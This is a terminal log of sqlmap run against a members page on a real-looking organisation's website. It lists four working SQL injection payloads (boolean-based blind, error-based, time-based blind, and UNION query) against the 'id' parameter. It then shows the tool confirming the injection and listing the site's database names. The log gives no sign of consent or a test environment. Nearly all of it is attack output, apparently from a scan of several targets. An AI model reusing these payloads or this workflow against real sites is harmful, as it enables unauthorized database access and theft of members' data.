        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.5.7#stable}
|_ -| . [(]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 08:32:56 /2021-11-29/

[?1049h[22;0;0t[1;44r(B[m[4l[?7h[44;1H[?1049l[23;0;0t[?1l>[08:32:56] [INFO] using 'STDIN' for parsing targets list
URL 1:
GET http://www.asfaa.org/members.php?id=1
do you want to test this URL? [Y/n/q]
> Y
[08:32:56] [INFO] testing URL 'http://www.asfaa.org/members.php?id=1'
[08:32:56] [INFO] resuming back-end DBMS 'mysql' 
[08:32:56] [INFO] using '/home/salazar/.local/share/sqlmap/output/results-11292021_0832am.csv' as the CSV results file in multiple targets mode
[08:32:56] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2547=2547

    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: id=-8218 OR 1 GROUP BY CONCAT(0x71786a7171,(SELECT (CASE WHEN (3282=3282) THEN 1 ELSE 0 END)),0x716a7a7171,FLOOR(RAND(0)*2)) HAVING MIN(0)#

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=1 AND (SELECT 8732 FROM (SELECT(SLEEP(5)))wtba)

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: id=-9895 UNION ALL SELECT NULL,CONCAT(0x71786a7171,0x63686851625066504d50766579677453474e4e6c4b7a615877437157685374696d45785458626b76,0x716a7a7171),NULL,NULL-- -
---
do you want to exploit this SQL injection? [Y/n] Y
[08:32:57] [INFO] the back-end DBMS is MySQL
web application technology: PHP 7.3.11, Apache 2.4.51
back-end DBMS: MySQL >= 5.0.12 (Percona fork)
[08:32:57] [INFO] fetching database names
[08:32:57] [INFO] resumed: 'information_schema'
[08:32:57] [INFO] resumed: 'db83231_acolop'
[08:32:57] [INFO] resumed: 'db83231_asfaa'
available databases [3]:
[*] db83231_acolop
[*] db83231_asfaa
[*] information_schema

[08:32:57] [INFO] you can find results of scanning in multiple targets mode inside the CSV file '/home/salazar/.local/share/sqlmap/output/results-11292021_0832am.csv'

[*] ending @ 08:32:57 /2021-11-29/

